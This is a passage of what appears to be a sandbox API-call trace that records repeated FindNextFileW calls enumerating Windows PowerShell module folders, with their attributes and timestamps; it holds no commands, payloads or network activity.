dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0198.765] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0198.765] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0198.766] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0198.766] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0198.766] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0198.766] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0198.766] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0198.767] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0198.767] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0198.767] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0198.767] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0198.767] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0198.768] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0198.768] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0198.768] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0198.768] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0198.768] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0198.768] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0198.769] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0198.769] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0198.769] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0198.769] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0198.769] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0198.770] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0198.770] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0198.770] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0198.770] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0198.770] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0198.771] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0198.771] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0198.771] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0198.771] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0198.771] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0198.772] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0198.772] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0198.772] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0198.772] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0198.772] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0198.772] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0198.773] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0198.773] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0198.773] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0198.773] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0198.773] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0198.774] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0198.774] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0198.774] FindNextFileW (in: 